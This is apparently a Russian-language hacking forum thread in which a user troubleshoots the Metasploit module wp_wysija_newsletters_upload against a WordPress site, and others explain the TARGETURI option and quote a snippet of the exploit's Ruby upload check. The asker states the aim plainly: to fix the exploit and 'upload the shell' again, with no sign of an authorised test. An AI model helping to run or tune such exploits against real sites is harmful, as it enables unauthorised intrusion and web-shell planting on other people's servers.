![]() |
Здравствуйте. Имеется эксплоит под одну уязвимую тему на Wordpress
exploit/unix/webapp/wp_wysija_newsletters_upload Не получается указать нужный путь к уязвимому плагину. Т.е., я ввожу set TARGETURI wp-content/plugins/wysija-newsletters ввожу остальные нужные опции, и после команды exploit вижу, что метас пытается загрузить пайлоад совсем не туда, куда мне нужно: /wp-content/plugins/wysija-newsletters/wp-content/uploads/wysija/themes/mvQnsWWrcB/SIqkFmvLlo.php В чём может быть дело? Может я не правильно указываю эту переменную? Рылся в Инете, ответа не нашёл. Всем заранее спасибо за ответ. P.S. Если я что-то не правильно объяснил, уточните. Время сейчас позднее и голова соображает очень плохо |
TARGETURI видимо в этом сплоите путь до вордпресса а не до плагина. Рекомендую заглянуть в доп. опции show advanced. Если там ничего похожего нет, то руками поправить сплоит. Или разобраться как работает и самому залить файлик.
|
судя по информации все-таки базовый путь до WP а не плагина
msf exploit(wp_wysija_newsletters_upload) > show options Module options (exploit/unix/webapp/wp_wysija_newsletter_upload): Name Current Settings Required Description ---- ---------------- -------- ----------- Proxies no A proxy chain of format type:hostort[,type:hostort][...] RHOST no The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / no The base path to the wordpress application VHOST no HTTP server virtual host если сплойт править то тут путь до плагина if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&relo ad=1&redirect=1' fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end |
Да... это проблемы уже с английским у меня XD. Ок, спасибо всем за помощь. Сейчас попробую подправить сплоит, и попробовать снова залить шелл.
|
| Время: 05:25 |